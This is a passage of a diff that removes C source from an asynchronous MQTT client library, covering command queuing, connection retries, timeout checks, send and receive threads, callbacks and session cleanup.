-			if (cur_response && command->onSuccess)
-			{
-				MQTTAsync_successData data;
-
-				data.token = command->token;
-				data.alt.pub.destinationName = command->details.pub.destinationName;
-				data.alt.pub.message.payload = command->details.pub.payload;
-				data.alt.pub.message.payloadlen = command->details.pub.payloadlen;
-				data.alt.pub.message.qos = command->details.pub.qos;
-				data.alt.pub.message.retained = command->details.pub.retained;
-				Log(TRACE_MIN, -1, "Calling publish success for client %s", m->c->clientID);
-				(*(command->onSuccess))(command->context, &data);
-			}
-			m->pending_write = NULL;
-
-			ListDetach(m->responses, com);
-			MQTTAsync_freeCommand(com);
-		}
-	}
-	FUNC_EXIT;
-}
-
-
-static int MQTTAsync_processCommand(void)
-{
-	int rc = 0;
-	MQTTAsync_queuedCommand* command = NULL;
-	ListElement* cur_command = NULL;
-	List* ignored_clients = NULL;
-
-	FUNC_ENTRY;
-	MQTTAsync_lock_mutex(mqttasync_mutex);
-	MQTTAsync_lock_mutex(mqttcommand_mutex);
-
-	/* only the first command in the list must be processed for any particular client, so if we skip
-	   a command for a client, we must skip all following commands for that client.  Use a list of
-	   ignored clients to keep track
-	*/
-	ignored_clients = ListInitialize();
-
-	/* don't try a command until there isn't a pending write for that client, and we are not connecting */
-	while (ListNextElement(commands, &cur_command))
-	{
-		MQTTAsync_queuedCommand* cmd = (MQTTAsync_queuedCommand*)(cur_command->content);
-
-		if (ListFind(ignored_clients, cmd->client))
-			continue;
-
-		if (cmd->command.type == CONNECT || cmd->command.type == DISCONNECT || (cmd->client->c->connected &&
-			cmd->client->c->connect_state == 0 && Socket_noPendingWrites(cmd->client->c->net.socket)))
-		{
-			if ((cmd->command.type == PUBLISH || cmd->command.type == SUBSCRIBE || cmd->command.type == UNSUBSCRIBE) &&
-				cmd->client->c->outboundMsgs->count >= MAX_MSG_ID - 1)
-			{
-				; /* no more message ids available */
-			}
-			else
-			{
-				command = cmd;
-				break;
-			}
-		}
-		ListAppend(ignored_clients, cmd->client, sizeof(cmd->client));
-	}
-	ListFreeNoContent(ignored_clients);
-	if (command)
-	{
-		ListDetach(commands, command);
-#if !defined(NO_PERSISTENCE)
-		if (command->client->c->persistence)
-			MQTTAsync_unpersistCommand(command);
-#endif
-	}
-	MQTTAsync_unlock_mutex(mqttcommand_mutex);
-
-	if (!command)
-		goto exit; /* nothing to do */
-
-	if (command->command.type == CONNECT)
-	{
-		if (command->client->c->connect_state != 0 || command->client->c->connected)
-			rc = 0;
-		else
-		{
-			char* serverURI = command->client->serverURI;
-
-			if (command->client->serverURIcount > 0)
-			{
-				serverURI = command->client->serverURIs[command->command.details.conn.currentURI];
-
-				if (strncmp(URI_TCP, serverURI, strlen(URI_TCP)) == 0)
-					serverURI += strlen(URI_TCP);
-#if defined(OPENSSL)
-				else if (strncmp(URI_SSL, serverURI, strlen(URI_SSL)) == 0)
-				{
-					serverURI += strlen(URI_SSL);
-					command->client->ssl = 1;
-				}
-#endif
-			}
-
-			if (command->client->c->MQTTVersion == MQTTVERSION_DEFAULT)
-			{
-				if (command->command.details.conn.MQTTVersion == 0)
-					command->command.details.conn.MQTTVersion = MQTTVERSION_3_1_1;
-				else if (command->command.details.conn.MQTTVersion == MQTTVERSION_3_1_1)
-					command->command.details.conn.MQTTVersion = MQTTVERSION_3_1;
-			}
-			else
-				command->command.details.conn.MQTTVersion = command->client->c->MQTTVersion;
-
-			Log(TRACE_MIN, -1, "Connecting to serverURI %s with MQTT version %d", serverURI, command->command.details.conn.MQTTVersion);
-#if defined(OPENSSL)
-			rc = MQTTProtocol_connect(serverURI, command->client->c, command->client->ssl, command->command.details.conn.MQTTVersion);
-#else
-			rc = MQTTProtocol_connect(serverURI, command->client->c, command->command.details.conn.MQTTVersion);
-#endif
-			if (command->client->c->connect_state == 0)
-				rc = SOCKET_ERROR;
-
-			/* if the TCP connect is pending, then we must call select to determine when the connect has completed,
-			which is indicated by the socket being ready *either* for reading *or* writing.  The next couple of lines
-			make sure we check for writeability as well as readability, otherwise we wait around longer than we need to
-			in Socket_getReadySocket() */
-			if (rc == EINPROGRESS)
-				Socket_addPendingWrite(command->client->c->net.socket);
-		}
-	}
-	else if (command->command.type == SUBSCRIBE)
-	{
-		List* topics = ListInitialize();
-		List* qoss = ListInitialize();
-		int i;
-
-		for (i = 0; i < command->command.details.sub.count; i++)
-		{
-			ListAppend(topics, command->command.details.sub.topics[i], strlen(command->command.details.sub.topics[i]));
-			ListAppend(qoss, &command->command.details.sub.qoss[i], sizeof(int));
-		}
-		rc = MQTTProtocol_subscribe(command->client->c, topics, qoss, command->command.token);
-		ListFreeNoContent(topics);
-		ListFreeNoContent(qoss);
-	}
-	else if (command->command.type == UNSUBSCRIBE)
-	{
-		List* topics = ListInitialize();
-		int i;
-
-		for (i = 0; i < command->command.details.unsub.count; i++)
-			ListAppend(topics, command->command.details.unsub.topics[i], strlen(command->command.details.unsub.topics[i]));
-
-		rc = MQTTProtocol_unsubscribe(command->client->c, topics, command->command.token);
-		ListFreeNoContent(topics);
-	}
-	else if (command->command.type == PUBLISH)
-	{
-		Messages* msg = NULL;
-		Publish* p = NULL;
-
-		p = malloc(sizeof(Publish));
-
-		p->payload = command->command.details.pub.payload;
-		p->payloadlen = command->command.details.pub.payloadlen;
-		p->topic = command->command.details.pub.destinationName;
-		p->msgId = command->command.token;
-
-		rc = MQTTProtocol_startPublish(command->client->c, p, command->command.details.pub.qos, command->command.details.pub.retained, &msg);
-
-		if (command->command.details.pub.qos == 0)
-		{
-			if (rc == TCPSOCKET_COMPLETE)
-			{
-				if (command->command.onSuccess)
-				{
-					MQTTAsync_successData data;
-
-					data.token = command->command.token;
-					data.alt.pub.destinationName = command->command.details.pub.destinationName;
-					data.alt.pub.message.payload = command->command.details.pub.payload;
-					data.alt.pub.message.payloadlen = command->command.details.pub.payloadlen;
-					data.alt.pub.message.qos = command->command.details.pub.qos;
-					data.alt.pub.message.retained = command->command.details.pub.retained;
-					Log(TRACE_MIN, -1, "Calling publish success for client %s", command->client->c->clientID);
-					(*(command->command.onSuccess))(command->command.context, &data);
-				}
-			}
-			else
-			{
-				command->command.details.pub.destinationName = NULL; /* this will be freed by the protocol code */
-				command->client->pending_write = &command->command;
-			}
-		}
-		else
-			command->command.details.pub.destinationName = NULL; /* this will be freed by the protocol code */
-		free(p); /* should this be done if the write isn't complete? */
-	}
-	else if (command->command.type == DISCONNECT)
-	{
-		if (command->client->c->connect_state != 0 || command->client->c->connected != 0)
-		{
-			command->client->c->connect_state = -2;
-			MQTTAsync_checkDisconnect(command->client, &command->command);
-		}
-	}
-
-	if (command->command.type == CONNECT && rc != SOCKET_ERROR && rc != MQTTASYNC_PERSISTENCE_ERROR)
-	{
-		command->client->connect = command->command;
-		MQTTAsync_freeCommand(command);
-	}
-	else if (command->command.type == DISCONNECT)
-	{
-		command->client->disconnect = command->command;
-		MQTTAsync_freeCommand(command);
-	}
-	else if (command->command.type == PUBLISH && command->command.details.pub.qos == 0)
-	{
-		if (rc == TCPSOCKET_INTERRUPTED)
-			ListAppend(command->client->responses, command, sizeof(command));
-		else
-			MQTTAsync_freeCommand(command);
-	}
-	else if (rc == SOCKET_ERROR || rc == MQTTASYNC_PERSISTENCE_ERROR)
-	{
-		if (command->command.type == CONNECT)
-		{
-			MQTTAsync_disconnectOptions opts = MQTTAsync_disconnectOptions_initializer;
-			MQTTAsync_disconnect(command->client, &opts); /* not "internal" because we don't want to call connection lost */
-			command->client->shouldBeConnected = 1; /* as above call is not "internal" we need to reset this */
-		}
-		else
-			MQTTAsync_disconnect_internal(command->client, 0);
-
-		if (command->command.type == CONNECT && MQTTAsync_checkConn(&command->command, command->client))
-		{
-			Log(TRACE_MIN, -1, "Connect failed, more to try");
-
-                        if (command->client->c->MQTTVersion == MQTTVERSION_DEFAULT)
-                        {
-                            if (command->command.details.conn.MQTTVersion == MQTTVERSION_3_1)
-                            {
-                                command->command.details.conn.currentURI++;
-                                command->command.details.conn.MQTTVersion = MQTTVERSION_DEFAULT;
-                            }
-                        }
-                        else
-                            command->command.details.conn.currentURI++;
-
-			/* put the connect command back to the head of the command queue, using the next serverURI */
-			rc = MQTTAsync_addCommand(command, sizeof(command->command.details.conn));
-		}
-		else
-		{
-			if (command->command.onFailure)
-			{
-				Log(TRACE_MIN, -1, "Calling command failure for client %s", command->client->c->clientID);
-				(*(command->command.onFailure))(command->command.context, NULL);
-			}
-			MQTTAsync_freeCommand(command);  /* free up the command if necessary */
-		}
-	}
-	else /* put the command into a waiting for response queue for each client, indexed by msgid */
-		ListAppend(command->client->responses, command, sizeof(command));
-
-exit:
-	MQTTAsync_unlock_mutex(mqttasync_mutex);
-	rc = (command != NULL);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-static void nextOrClose(MQTTAsyncs* m, int rc, char* message)
-{
-	if (MQTTAsync_checkConn(&m->connect, m))
-	{
-		MQTTAsync_queuedCommand* conn;
-
-		MQTTAsync_closeOnly(m->c);
-		/* put the connect command back to the head of the command queue, using the next serverURI */
-		conn = malloc(sizeof(MQTTAsync_queuedCommand));
-		memset(conn, '\0', sizeof(MQTTAsync_queuedCommand));
-		conn->client = m;
-		conn->command = m->connect;
-		Log(TRACE_MIN, -1, "Connect failed, more to try");
-
-                if (conn->client->c->MQTTVersion == MQTTVERSION_DEFAULT)
-                {
-                    if (conn->command.details.conn.MQTTVersion == MQTTVERSION_3_1)
-                    {
-                        conn->command.details.conn.currentURI++;
-                        conn->command.details.conn.MQTTVersion = MQTTVERSION_DEFAULT;
-                    }
-                }
-                else
-                    conn->command.details.conn.currentURI++;
-
-		MQTTAsync_addCommand(conn, sizeof(m->connect));
-	}
-	else
-	{
-		MQTTAsync_closeSession(m->c);
-	  if (m->connect.onFailure)
-		{
-			MQTTAsync_failureData data;
-
-			data.token = 0;
-			data.code = rc;
-			data.message = message;
-			Log(TRACE_MIN, -1, "Calling connect failure for client %s", m->c->clientID);
-			(*(m->connect.onFailure))(m->connect.context, &data);
-		}
-		MQTTAsync_startConnectRetry(m);
-	}
-}
-
-
-static void MQTTAsync_checkTimeouts(void)
-{
-	ListElement* current = NULL;
-	static time_t last = 0L;
-	time_t now;
-
-	FUNC_ENTRY;
-	time(&(now));
-	if (difftime(now, last) < 3)
-		goto exit;
-
-	MQTTAsync_lock_mutex(mqttasync_mutex);
-	last = now;
-	while (ListNextElement(handles, &current))		/* for each client */
-	{
-		ListElement* cur_response = NULL;
-		int i = 0,
-			timed_out_count = 0;
-
-		MQTTAsyncs* m = (MQTTAsyncs*)(current->content);
-
-		/* check disconnect timeout */
-		if (m->c->connect_state == -2)
-			MQTTAsync_checkDisconnect(m, &m->disconnect);
-
-		/* check connect timeout */
-		if (m->c->connect_state != 0 && MQTTAsync_elapsed(m->connect.start_time) > (m->connectTimeout * 1000))
-		{
-			nextOrClose(m, MQTTASYNC_FAILURE, "TCP connect timeout");
-			continue;
-		}
-
-		timed_out_count = 0;
-		/* check response timeouts */
-		while (ListNextElement(m->responses, &cur_response))
-		{
-			MQTTAsync_queuedCommand* com = (MQTTAsync_queuedCommand*)(cur_response->content);
-
-			if (1 /*MQTTAsync_elapsed(com->command.start_time) < 120000*/)
-				break; /* command has not timed out */
-			else
-			{
-				if (com->command.onFailure)
-				{
-					Log(TRACE_MIN, -1, "Calling %s failure for client %s",
-								MQTTPacket_name(com->command.type), m->c->clientID);
-					(*(com->command.onFailure))(com->command.context, NULL);
-				}
-				timed_out_count++;
-			}
-		}
-		for (i = 0; i < timed_out_count; ++i)
-			ListRemoveHead(m->responses);	/* remove the first response in the list */
-
-		if (m->automaticReconnect && m->retrying)
-		{
-			if (m->reconnectNow || MQTTAsync_elapsed(m->lastConnectionFailedTime) > (m->currentInterval * 1000))
-			{
-				/* to reconnect put the connect command to the head of the command queue */
-				MQTTAsync_queuedCommand* conn = malloc(sizeof(MQTTAsync_queuedCommand));
-				memset(conn, '\0', sizeof(MQTTAsync_queuedCommand));
-				conn->client = m;
-				conn->command = m->connect;
-	  			/* make sure that the version attempts are restarted */
-				if (m->c->MQTTVersion == MQTTVERSION_DEFAULT)
-					conn->command.details.conn.MQTTVersion = 0;
-				Log(TRACE_MIN, -1, "Automatically attempting to reconnect");
-				MQTTAsync_addCommand(conn, sizeof(m->connect));
-				m->reconnectNow = 0;
-			}
-		}
-	}
-	MQTTAsync_unlock_mutex(mqttasync_mutex);
-exit:
-	FUNC_EXIT;
-}
-
-
-static thread_return_type WINAPI MQTTAsync_sendThread(void* n)
-{
-	FUNC_ENTRY;
-	MQTTAsync_lock_mutex(mqttasync_mutex);
-	sendThread_state = RUNNING;
-	sendThread_id = Thread_getid();
-	MQTTAsync_unlock_mutex(mqttasync_mutex);
-	while (!tostop)
-	{
-		int rc;
-
-		while (commands->count > 0)
-		{
-			if (MQTTAsync_processCommand() == 0)
-				break;  /* no commands were processed, so go into a wait */
-		}
-#if !defined(WIN32) && !defined(WIN64)
-		if ((rc = Thread_wait_cond(send_cond, 1)) != 0 && rc != ETIMEDOUT)
-			Log(LOG_ERROR, -1, "Error %d waiting for condition variable", rc);
-#else
-		if ((rc = Thread_wait_sem(send_sem, 1000)) != 0 && rc != ETIMEDOUT)
-			Log(LOG_ERROR, -1, "Error %d waiting for semaphore", rc);
-#endif
-
-		MQTTAsync_checkTimeouts();
-	}
-	sendThread_state = STOPPING;
-	MQTTAsync_lock_mutex(mqttasync_mutex);
-	sendThread_state = STOPPED;
-	sendThread_id = 0;
-	MQTTAsync_unlock_mutex(mqttasync_mutex);
-	FUNC_EXIT;
-	return 0;
-}
-
-
-static void MQTTAsync_emptyMessageQueue(Clients* client)
-{
-	FUNC_ENTRY;
-	/* empty message queue */
-	if (client->messageQueue->count > 0)
-	{
-		ListElement* current = NULL;
-		while (ListNextElement(client->messageQueue, &current))
-		{
-			qEntry* qe = (qEntry*)(current->content);
-			free(qe->topicName);
-			free(qe->msg->payload);
-			free(qe->msg);
-		}
-		ListEmpty(client->messageQueue);
-	}
-	FUNC_EXIT;
-}
-
-
-static void MQTTAsync_removeResponsesAndCommands(MQTTAsyncs* m)
-{
-	int count = 0;
-	ListElement* current = NULL;
-	ListElement *next = NULL;
-
-	FUNC_ENTRY;
-	if (m->responses)
-	{
-		ListElement* cur_response = NULL;
-
-		while (ListNextElement(m->responses, &cur_response))
-		{
-			MQTTAsync_queuedCommand* command = (MQTTAsync_queuedCommand*)(cur_response->content);
-
-			if (command->command.onFailure)
-			{
-				MQTTAsync_failureData data;
-
-				data.token = command->command.token;
-				data.code = MQTTASYNC_OPERATION_INCOMPLETE; /* interrupted return code */
-				data.message = NULL;
-
-				Log(TRACE_MIN, -1, "Calling %s failure for client %s",
-						MQTTPacket_name(command->command.type), m->c->clientID);
-				(*(command->command.onFailure))(command->command.context, &data);
-			}
-
-			MQTTAsync_freeCommand1(command);
-			count++;
-		}
-	}
-	ListEmpty(m->responses);
-	Log(TRACE_MINIMUM, -1, "%d responses removed for client %s", count, m->c->clientID);
-
-	/* remove commands in the command queue relating to this client */
-	count = 0;
-	current = ListNextElement(commands, &next);
-	ListNextElement(commands, &next);
-	while (current)
-	{
-		MQTTAsync_queuedCommand* command = (MQTTAsync_queuedCommand*)(current->content);
-
-		if (command->client == m)
-		{
-			ListDetach(commands, command);
-
-			if (command->command.onFailure)
-			{
-				MQTTAsync_failureData data;
-
-				data.token = command->command.token;
-				data.code = MQTTASYNC_OPERATION_INCOMPLETE; /* interrupted return code */
-				data.message = NULL;
-
-				Log(TRACE_MIN, -1, "Calling %s failure for client %s",
-							MQTTPacket_name(command->command.type), m->c->clientID);
-					(*(command->command.onFailure))(command->command.context, &data);
-			}
-
-			MQTTAsync_freeCommand(command);
-			count++;
-		}
-		current = next;
-		ListNextElement(commands, &next);
-	}
-	Log(TRACE_MINIMUM, -1, "%d commands removed for client %s", count, m->c->clientID);
-	FUNC_EXIT;
-}
-
-
-void MQTTAsync_destroy(MQTTAsync* handle)
-{
-	MQTTAsyncs* m = *handle;
-
-	FUNC_ENTRY;
-	MQTTAsync_lock_mutex(mqttasync_mutex);
-
-	if (m == NULL)
-		goto exit;
-
-	MQTTAsync_removeResponsesAndCommands(m);
-	ListFree(m->responses);
-
-	if (m->c)
-	{
-		int saved_socket = m->c->net.socket;
-		char* saved_clientid = MQTTStrdup(m->c->clientID);
-#if !defined(NO_PERSISTENCE)
-		MQTTPersistence_close(m->c);
-#endif
-		MQTTAsync_emptyMessageQueue(m->c);
-		MQTTProtocol_freeClient(m->c);
-		if (!ListRemove(bstate->clients, m->c))
-			Log(LOG_ERROR, 0, NULL);
-		else
-			Log(TRACE_MIN, 1, NULL, saved_clientid, saved_socket);
-		free(saved_clientid);
-	}
-
-	if (m->serverURI)
-		free(m->serverURI);
-	if (m->createOptions)
-		free(m->createOptions);
-	MQTTAsync_freeServerURIs(m);
-	if (!ListRemove(handles, m))
-		Log(LOG_ERROR, -1, "free error");
-	*handle = NULL;
-	if (bstate->clients->count == 0)
-		MQTTAsync_terminate();
-
-exit:
-	MQTTAsync_unlock_mutex(mqttasync_mutex);
-	FUNC_EXIT;
-}
-
-
-void MQTTAsync_freeMessage(MQTTAsync_message** message)
-{
-	FUNC_ENTRY;
-	free((*message)->payload);
-	free(*message);
-	*message = NULL;
-	FUNC_EXIT;
-}
-
-
-void MQTTAsync_free(void* memory)
-{
-	FUNC_ENTRY;
-	free(memory);
-	FUNC_EXIT;
-}
-
-
-static int MQTTAsync_completeConnection(MQTTAsyncs* m, MQTTPacket* pack)
-{
-	int rc = MQTTASYNC_FAILURE;
-
-	FUNC_ENTRY;
-	if (m->c->connect_state == 3) /* MQTT connect sent - wait for CONNACK */
-	{
-		Connack* connack = (Connack*)pack;
-		Log(LOG_PROTOCOL, 1, NULL, m->c->net.socket, m->c->clientID, connack->rc);
-		if ((rc = connack->rc) == MQTTASYNC_SUCCESS)
-		{
-			m->retrying = 0;
-			m->c->connected = 1;
-			m->c->good = 1;
-			m->c->connect_state = 0;
-			if (m->c->cleansession)
-				rc = MQTTAsync_cleanSession(m->c);
-			if (m->c->outboundMsgs->count > 0)
-			{
-				ListElement* outcurrent = NULL;
-
-				while (ListNextElement(m->c->outboundMsgs, &outcurrent))
-				{
-					Messages* m = (Messages*)(outcurrent->content);
-					m->lastTouch = 0;
-				}
-				MQTTProtocol_retry((time_t)0, 1, 1);
-				if (m->c->connected != 1)
-					rc = MQTTASYNC_DISCONNECTED;
-			}
-		}
-		free(connack);
-		m->pack = NULL;
-#if !defined(WIN32) && !defined(WIN64)
-		Thread_signal_cond(send_cond);
-#else
-		if (!Thread_check_sem(send_sem))
-			Thread_post_sem(send_sem);
-#endif
-	}
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-/* This is the thread function that handles the calling of callback functions if set */
-static thread_return_type WINAPI MQTTAsync_receiveThread(void* n)
-{
-	long timeout = 10L; /* first time in we have a small timeout.  Gets things started more quickly */
-
-	FUNC_ENTRY;
-	MQTTAsync_lock_mutex(mqttasync_mutex);
-	receiveThread_state = RUNNING;
-	receiveThread_id = Thread_getid();
-	while (!tostop)
-	{
-		int rc = SOCKET_ERROR;
-		int sock = -1;
-		MQTTAsyncs* m = NULL;
-		MQTTPacket* pack = NULL;
-
-		MQTTAsync_unlock_mutex(mqttasync_mutex);
-		pack = MQTTAsync_cycle(&sock, timeout, &rc);
-		MQTTAsync_lock_mutex(mqttasync_mutex);
-		if (tostop)
-			break;
-		timeout = 1000L;
-
-		if (sock == 0)
-			continue;
-		/* find client corresponding to socket */
-		if (ListFindItem(handles, &sock, clientSockCompare) == NULL)
-		{
-			Log(TRACE_MINIMUM, -1, "Could not find client corresponding to socket %d", sock);
-			/* Socket_close(sock); - removing socket in this case is not necessary (Bug 442400) */
-			continue;
-		}
-		m = (MQTTAsyncs*)(handles->current->content);
-		if (m == NULL)
-		{
-			Log(LOG_ERROR, -1, "Client structure was NULL for socket %d - removing socket", sock);
-			Socket_close(sock);
-			continue;
-		}
-		if (rc == SOCKET_ERROR)
-		{
-			Log(TRACE_MINIMUM, -1, "Error from MQTTAsync_cycle() - removing socket %d", sock);
-			if (m->c->connected == 1)
-			{
-				MQTTAsync_unlock_mutex(mqttasync_mutex);
-				MQTTAsync_disconnect_internal(m, 0);
-				MQTTAsync_lock_mutex(mqttasync_mutex);
-			}
-			else if (m->c->connect_state != 0)
-				nextOrClose(m, rc, "socket error");
-			else /* calling disconnect_internal won't have any effect if we're already disconnected */
-				MQTTAsync_closeOnly(m->c);
-		}
-		else
-		{
-			if (m->c->messageQueue->count > 0)
-			{
-				qEntry* qe = (qEntry*)(m->c->messageQueue->first->content);
-				int topicLen = qe->topicLen;
-
-				if (strlen(qe->topicName) == topicLen)
-					topicLen = 0;
-
-				if (m->ma)
-					rc = MQTTAsync_deliverMessage(m, qe->topicName, topicLen, qe->msg);
-				else
-					rc = 1;
-
-				if (rc)
-				{
-					ListRemove(m->c->messageQueue, qe);
-#if !defined(NO_PERSISTENCE)
-					if (m->c->persistence)
-						MQTTPersistence_unpersistQueueEntry(m->c, (MQTTPersistence_qEntry*)qe);
-#endif
-				}
-				else
-					Log(TRACE_MIN, -1, "False returned from messageArrived for client %s, message remains on queue",
-						m->c->clientID);
-			}
-			if (pack)
-			{
-				if (pack->header.bits.type == CONNACK)
-				{
-					int sessionPresent = ((Connack*)pack)->flags.bits.sessionPresent;
-					int rc = MQTTAsync_completeConnection(m, pack);
-
-					if (rc == MQTTASYNC_SUCCESS)
-					{
-						int onSuccess = 0;
-						if (m->serverURIcount > 0)
-							Log(TRACE_MIN, -1, "Connect succeeded to %s",
-								m->serverURIs[m->connect.details.conn.currentURI]);
-						onSuccess = (m->connect.onSuccess != NULL); /* save setting of onSuccess callback */
-						if (m->connect.onSuccess)
-						{
-							MQTTAsync_successData data;
-							memset(&data, '\0', sizeof(data));
-							Log(TRACE_MIN, -1, "Calling connect success for client %s", m->c->clientID);
-							if (m->serverURIcount > 0)
-								data.alt.connect.serverURI = m->serverURIs[m->connect.details.conn.currentURI];
-							else
-								data.alt.connect.serverURI = m->serverURI;
-							data.alt.connect.MQTTVersion = m->connect.details.conn.MQTTVersion;
-							data.alt.connect.sessionPresent = sessionPresent;
-							(*(m->connect.onSuccess))(m->connect.context, &data);
-							m->connect.onSuccess = NULL; /* don't accidentally call it again */
-						}
-						if (m->connected)
-						{
-							char* reason = (onSuccess) ? "connect onSuccess called" : "automatic reconnect";
-							Log(TRACE_MIN, -1, "Calling connected for client %s", m->c->clientID);
-							(*(m->connected))(m->connected_context, reason);
-						}
-					}
-					else
-						nextOrClose(m, rc, "CONNACK return code");
-				}
-				else if (pack->header.bits.type == SUBACK)
-				{
-					ListElement* current = NULL;
-
-					/* use the msgid to find the callback to be called */
-					while (ListNextElement(m->responses, &current))
-					{
-						MQTTAsync_queuedCommand* command = (MQTTAsync_queuedCommand*)(current->content);
-						if (command->command.token == ((Suback*)pack)->msgId)
-						{
-							Suback* sub = (Suback*)pack;
-							if (!ListDetach(m->responses, command)) /* remove the response from the list */
-								Log(LOG_ERROR, -1, "Subscribe command not removed from command list");
-
-							/* Call the failure callback if there is one subscribe in the MQTT packet and
-							 * the return code is 0x80 (failure).  If the MQTT packet contains >1 subscription
-							 * request, then we call onSuccess with the list of returned QoSs, which inelegantly,
-							 * could include some failures, or worse, the whole list could have failed.
-							 */
-							if (sub->qoss->count == 1 && *(int*)(sub->qoss->first->content) == MQTT_BAD_SUBSCRIBE)
-							{
-								if (command->command.onFailure)
-								{
-									MQTTAsync_failureData data;
-
-									data.token = command->command.token;
-									data.code = *(int*)(sub->qoss->first->content);
-									data.message = NULL;
-									Log(TRACE_MIN, -1, "Calling subscribe failure for client %s", m->c->clientID);
-									(*(command->command.onFailure))(command->command.context, &data);
-								}
-							}
-							else if (command->command.onSuccess)
-							{
-								MQTTAsync_successData data;
-								int* array = NULL;
-
-								if (sub->qoss->count == 1)
-									data.alt.qos = *(int*)(sub->qoss->first->content);
-								else if (sub->qoss->count > 1)
-								{
-									ListElement* cur_qos = NULL;
-									int* element = array = data.alt.qosList = malloc(sub->qoss->count * sizeof(int));
-									while (ListNextElement(sub->qoss, &cur_qos))
-										*element++ = *(int*)(cur_qos->content);
-								}
-								data.token = command->command.token;
-								Log(TRACE_MIN, -1, "Calling subscribe success for client %s", m->c->clientID);
-								(*(command->command.onSuccess))(command->command.context, &data);
-								if (array)
-									free(array);
-							}
-							MQTTAsync_freeCommand(command);
-							break;
-						}
-					}
-					rc = MQTTProtocol_handleSubacks(pack, m->c->net.socket);
-				}
-				else if (pack->header.bits.type == UNSUBACK)
-				{
-					ListElement* current = NULL;
-					int handleCalled = 0;
-
-					/* use the msgid to find the callback to be called */
-					while (ListNextElement(m->responses, &current))
-					{
-						MQTTAsync_queuedCommand* command = (MQTTAsync_queuedCommand*)(current->content);
-						if (command->command.token == ((Unsuback*)pack)->msgId)
-						{
-							if (!ListDetach(m->responses, command)) /* remove the response from the list */
-								Log(LOG_ERROR, -1, "Unsubscribe command not removed from command list");
-							if (command->command.onSuccess)
-							{
-								rc = MQTTProtocol_handleUnsubacks(pack, m->c->net.socket);
-								handleCalled = 1;
-								Log(TRACE_MIN, -1, "Calling unsubscribe success for client %s", m->c->clientID);
-								(*(command->command.onSuccess))(command->command.context, NULL);
-							}
-							MQTTAsync_freeCommand(command);
-							break;
-						}
-					}
-					if (!handleCalled)
-						rc = MQTTProtocol_handleUnsubacks(pack, m->c->net.socket);
-				}
-			}
-		}
-	}
-	receiveThread_state = STOPPED;
-	receiveThread_id = 0;
-	MQTTAsync_unlock_mutex(mqttasync_mutex);
-#if !defined(WIN32) && !defined(WIN64)
-	if (sendThread_state != STOPPED)
-		Thread_signal_cond(send_cond);
-#else
-	if (sendThread_state != STOPPED && !Thread_check_sem(send_sem))
-		Thread_post_sem(send_sem);
-#endif
-	FUNC_EXIT;
-	return 0;
-}
-
-
-static void MQTTAsync_stop(void)
-{
-	int rc = 0;
-
-	FUNC_ENTRY;
-	if (sendThread_state != STOPPED || receiveThread_state != STOPPED)
-	{
-		int conn_count = 0;
-		ListElement* current = NULL;
-
-		if (handles != NULL)
-		{
-			/* find out how many handles are still connected */
-			while (ListNextElement(handles, &current))
-			{
-				if (((MQTTAsyncs*)(current->content))->c->connect_state > 0 ||
-						((MQTTAsyncs*)(current->content))->c->connected)
-					++conn_count;
-			}
-		}
-		Log(TRACE_MIN, -1, "Conn_count is %d", conn_count);
-		/* stop the background thread, if we are the last one to be using it */
-		if (conn_count == 0)
-		{
-			int count = 0;
-			tostop = 1;
-			while ((sendThread_state != STOPPED || receiveThread_state != STOPPED) && ++count < 100)
-			{
-				MQTTAsync_unlock_mutex(mqttasync_mutex);
-				Log(TRACE_MIN, -1, "sleeping");
-				MQTTAsync_sleep(100L);
-				MQTTAsync_lock_mutex(mqttasync_mutex);
-			}
-			rc = 1;
-			tostop = 0;
-		}
-	}
-	FUNC_EXIT_RC(rc);
-}
-
-
-int MQTTAsync_setCallbacks(MQTTAsync handle, void* context,
-									MQTTAsync_connectionLost* cl,
-									MQTTAsync_messageArrived* ma,
-									MQTTAsync_deliveryComplete* dc)
-{
-	int rc = MQTTASYNC_SUCCESS;
-	MQTTAsyncs* m = handle;
-
-	FUNC_ENTRY;
-	MQTTAsync_lock_mutex(mqttasync_mutex);
-
-	if (m == NULL || ma == NULL || m->c->connect_state != 0)
-		rc = MQTTASYNC_FAILURE;
-	else
-	{
-		m->context = context;
-		m->cl = cl;
-		m->ma = ma;
-		m->dc = dc;
-	}
-
-	MQTTAsync_unlock_mutex(mqttasync_mutex);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-int MQTTAsync_setConnected(MQTTAsync handle, void* context, MQTTAsync_connected* connected)
-{
-	int rc = MQTTASYNC_SUCCESS;
-	MQTTAsyncs* m = handle;
-
-	FUNC_ENTRY;
-	MQTTAsync_lock_mutex(mqttasync_mutex);
-
-	if (m == NULL || m->c->connect_state != 0)
-		rc = MQTTASYNC_FAILURE;
-	else
-	{
-		m->connected_context = context;
-		m->connected = connected;
-	}
-
-	MQTTAsync_unlock_mutex(mqttasync_mutex);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-static void MQTTAsync_closeOnly(Clients* client)
-{
-	FUNC_ENTRY;
-	client->good = 0;
-	client->ping_outstanding = 0;
-	if (client->net.socket > 0)
-	{
-		if (client->connected)
-			MQTTPacket_send_disconnect(&client->net, client->clientID);
-		Thread_lock_mutex(socket_mutex);
-#if defined(OPENSSL)
-		SSLSocket_close(&client->net);
-#endif
-		Socket_close(client->net.socket);
-		client->net.socket = 0;
-#if defined(OPENSSL)
-		client->net.ssl = NULL;
-#endif
-		Thread_unlock_mutex(socket_mutex);
-	}
-	client->connected = 0;
-	client->connect_state = 0;
-	FUNC_EXIT;
-}
-
-
-static void MQTTAsync_closeSession(Clients* client)
-{
-	FUNC_ENTRY;
-	MQTTAsync_closeOnly(client);
-
-	if (client->cleansession)
-		MQTTAsync_cleanSession(client);
-
-	FUNC_EXIT;
-}
-
-
-/**
- * List callback function for comparing clients by client structure
- * @param a Async structure
- * @param b Client structure
- * @return boolean indicating whether a and b are equal
- */
-static int clientStructCompare(void* a, void* b)
-{
-	MQTTAsyncs* m = (MQTTAsyncs*)a;
-	return m->c == (Clients*)b;
-}
-
-
-static int MQTTAsync_cleanSession(Clients* client)
-{
-	int rc = 0;
-	ListElement* found = NULL;
-
-	FUNC_ENTRY;
-#if !defined(NO_PERSISTENCE)
-	rc = MQTTPersistence_clear(client);
-#endif
-	MQTTProtocol_emptyMessageList(client->inboundMsgs);
-	MQTTProtocol_emptyMessageList(client->outboundMsgs);
-	MQTTAsync_emptyMessageQueue(client);
-	client->msgID = 0;
-
